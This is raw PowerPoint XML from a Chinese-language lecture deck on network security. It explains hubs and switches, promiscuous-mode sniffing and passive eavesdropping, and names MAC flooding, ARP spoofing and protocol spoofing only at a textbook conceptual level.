                  <a:t>hub</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12326" name="Line 32"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2053" y="3148"/>
                <a:ext cx="267" cy="1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310" name="Text Box 3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A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12311" name="Text Box 3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B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12312" name="Text Box 3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C</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12313" name="Text Box 3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rPr>
                <a:t>D</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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4253">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3942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4253">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3942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2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4253">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3942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25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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网卡工作在数据链路层</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以帧为单位进行传输</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帧头含目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址和源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>普通模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网卡只接收与自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址相同的数据包，并将其传递给操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>“混杂”模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网卡将所有经过的数据包都传递给操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163842" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>共享式网络监听原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>未经用户同意和认可，将信息泄露给攻击者，但不对数据信息做任何修改。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>常见手段：搭线监听、无线截（取）获、其他截获。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击方式：消息内容分析、通信量分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通信量分析：测定通信主机的位置和标识，观察被交换消息的频率和长度。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特点：不易被发现。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>预防措施：重点在于预防 ，如使用虚拟专用网（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）、加密保护</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292866" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>被动攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对受害者无影响</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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FBC64B68-A349-484A-B1AE-51482B15072A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工作在链路层，物理上和逻辑上都是星型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>维护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口”映射</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发帧到特定端口，不同端口可同时工作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>A’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>B’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>同时工作，不冲突</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75780" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Ethernet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144386" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>链路层和局域网</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387"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r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>5-</a:t>
            </a:r>
            <a:fld id="{CCD06FB9-67A5-4406-83E0-A4ECEAF8DD85}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6839272" y="4016077"/>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49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7713985" y="3666827"/>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6" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696522" y="3604914"/>
            <a:ext cx="70211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sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7802885" y="4046239"/>
            <a:ext cx="339837"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3</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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6559872" y="3608089"/>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endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="仿宋_GB2312"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7223447" y="4047827"/>
            <a:ext cx="511358"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sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</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B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</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A`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Picture 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647" y="3897883"/>
            <a:ext cx="3180161" cy="29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073937" y="5377941"/>
            <a:ext cx="6687269" cy="830997"/>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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>平面交通</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>立体交通</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C0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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="400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03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0387">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4003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03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0387">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4003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0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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口映射表转发数据包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>此时只能监听广播数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络监听：须使不应到达的数据包到达本地</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>洪水包：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换机发送大量含有虚假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包，使交换机无法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>处理而工作异常，进入“失效”模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用交换机的镜像功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216066" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换式网络监听原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E28B99C0-D253-4399-9EC5-4C99E0DEA534}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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smtClean="0"/>
              <a:t>利用网络协议设计中的缺陷，通过发送伪造的数据包达到欺骗目标、从中获利</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>哪些协议设计有缺陷，是容易受到攻击的呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53250" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
